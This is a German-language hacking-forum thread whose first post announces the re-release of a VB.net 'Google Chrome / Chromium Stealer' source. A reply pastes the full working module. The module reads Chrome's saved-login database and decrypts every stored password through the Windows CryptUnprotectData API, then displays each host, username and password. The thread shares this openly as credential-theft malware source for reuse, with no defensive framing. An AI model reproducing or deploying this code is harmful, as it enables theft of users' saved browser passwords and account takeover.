Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > .NET Languages
You last visited: Today at 18:19

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[Source VB.net] Google Chrome / Chromium Stealer

Discussion on [Source VB.net] Google Chrome / Chromium Stealer within the .NET Languages forum part of the Coders Den category.

Closed Thread
 
Old   #1
 
elite*gold: 29
Join Date: Feb 2011
Posts: 184
Received Thanks: 190
Talking [Source VB.net] Google Chrome / Chromium Stealer


Nach einen Research hab ich den Chrome Stealer den man als funktioniernde Source leider nicht mehr downloaden kann wieder zuusammengebastelt um sie erneut zu releasen

Macht damit nichts böses (obwohl das ja kaum möglich ist)
Credits sind jeweils in den Modul
.vb können in jedes Projekt eingebunden werden !

Download :
VirusTotal :
Hash : aefa41d8ff11b6778b8e8ef63aad57ca
Password :
Bitte leeched das teil nicht und falls doch postet den mein Putlocker Link
<[.P!xel.]> is offline  
Old 07/18/2012, 09:46   #2

 
boxxiebabee's Avatar
 
elite*gold: 0
Join Date: May 2008
Posts: 1,222
Received Thanks: 500
Woher hast denn den Source schon wieder geklaut? :>
boxxiebabee is offline  
Thanks
2 Users
Old 07/18/2012, 11:50   #3
 
tolio's Avatar
 
elite*gold: 2932
The Black Market: 169/1/0
Join Date: Oct 2009
Posts: 6,966
Received Thanks: 1,097
Quote:
=== Chrome Stealer Module coded by RockingWithTheBest ===
=== Repacked & re-released & re-uploaded by ===
________ .__
/ _____/______ |__|__ ___
/ \ ___\____ \| \ \/ /
\ \_\ \ |_> > |> <
\______ / __/|__/__/\_ \
\/|__| \/
'aka P!xel
du machst dich ja so lächerlich, geh doch bitte zu free-hack oder sowas >.<



hier der orignal code (1min googlen):
Code:
'**************************************************************
'
'               Coded By: RockingWithTheBest
'
'                           v 0.1
'
'**************************************************************

Imports System.Runtime.InteropServices
Imports System.IO
Imports System.Text

Module Chrome

    Public cPass As String
    Public Sub GetChrome()
        Dim datapath As String = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login Data"

        Try
            Dim SQLDatabase = New SQLiteHandler(datapath)
            SQLDatabase.ReadTable("logins")

            If File.Exists(datapath) Then

                Dim host, user, pass As String

                For i = 0 To SQLDatabase.GetRowCount() - 1 Step 1
                    host = SQLDatabase.GetValue(i, "origin_url")
                    user = SQLDatabase.GetValue(i, "username_value")
                    pass = Decrypt(System.Text.Encoding.Default.GetBytes(SQLDatabase.GetValue(i, "password_value")))

                    If (user <> "") And (pass <> "") Then
                        cPass = ("============Chrome==============" & vbNewLine & "Host: " & host & vbNewLine & "Username: " & user & vbNewLine & "Password: " & pass & vbNewLine & "=============================" _
                        & vbNewLine & " ")
                        MsgBox(cPass)
                    End If
                Next

            End If
        Catch e As Exception
            MsgBox(e.ToString)
        End Try
    End Sub
    <DllImport("Crypt32.dll", SetLastError:=True, CharSet:=System.Runtime.InteropServices.CharSet.Auto)> _
    Private Function CryptUnprotectData(ByRef pDataIn As DATA_BLOB, ByVal szDataDescr As String, ByRef pOptionalEntropy As DATA_BLOB, ByVal pvReserved As IntPtr, ByRef pPromptStruct As CRYPTPROTECT_PROMPTSTRUCT, ByVal dwFlags As Integer, ByRef pDataOut As DATA_BLOB) As Boolean
    End Function
    <Flags()> Enum CryptProtectPromptFlags
        CRYPTPROTECT_PROMPT_ON_UNPROTECT = &H1
        CRYPTPROTECT_PROMPT_ON_PROTECT = &H2
    End Enum
    <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure CRYPTPROTECT_PROMPTSTRUCT
        Public cbSize As Integer
        Public dwPromptFlags As CryptProtectPromptFlags
        Public hwndApp As IntPtr
        Public szPrompt As String
    End Structure
    <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure DATA_BLOB
        Public cbData As Integer
        Public pbData As IntPtr
    End Structure
    Function Decrypt(ByVal Datas() As Byte) As String
        Dim inj, Ors As New DATA_BLOB
        Dim Ghandle As GCHandle = GCHandle.Alloc(Datas, GCHandleType.Pinned)
        inj.pbData = Ghandle.AddrOfPinnedObject()
        inj.cbData = Datas.Length
        Ghandle.Free()
        CryptUnprotectData(inj, Nothing, Nothing, Nothing, Nothing, 0, Ors)
        Dim Returned() As Byte = New Byte(Ors.cbData) {}
        Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData)
        Dim TheString As String = Encoding.Default.GetString(Returned)
        Return TheString.Substring(0, TheString.Length - 1)
    End Function

End Module
tolio is offline  
Thanks
3 Users
Closed Thread


Similar Threads Similar Threads
How to edit page source in google chrome
12/29/2011 - DarkOrbit - 1 Replies
Can you tell me?
Google Chrome..
07/13/2011 - Technical Support - 2 Replies
Er geht wieder nicht. Ich habe bereits die LAN- Einstellungen geändert, aber es hilft nichts...
Google Chrome..
07/12/2011 - Technical Support - 10 Replies
Das reagiert einfach nimmer.... das ladet einfach..... Heute Mittag ging es noch... http://img850.imageshack.us/img850/2171/unbenannt sg.png Uploaded with ImageShack.us
Google Chrome!
06/22/2011 - Technical Support - 8 Replies
Hey Community, Ich hatte eine Easybox und habe gestern eine Fritzbox von meinem Anbieter zu geschickt bekommen da die Easy box immer abstürtzt. Ich habe dann die Fritzbox Wlan Fon 7170 angeschloßen, und internet funktioniert. Nur wenn ich Google Chrome starte, dauert das nur am anfang wo Google öffnet eine Weile bis es öffnet, Wenn es einmal geöffnet wurde ist er dann wieder einwandfrei. Meine Frage ist muss ich was einstellen etc.?
Google Chrome
04/28/2011 - Technical Support - 5 Replies
Hallo und zwar heb ich ein problem. Immer wenn ich in Google chrome einen neuen tab öffnen öffnet sich Browser Search Start und da wollte ich frage wie ich das änder kann. Und jetzt sagt nicht Chrome ist scheiße benutz lieber Firefox. Nein werde ich nicht!



All times are GMT +1. The time now is 18:20.


Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2025 elitepvpers All Rights Reserved.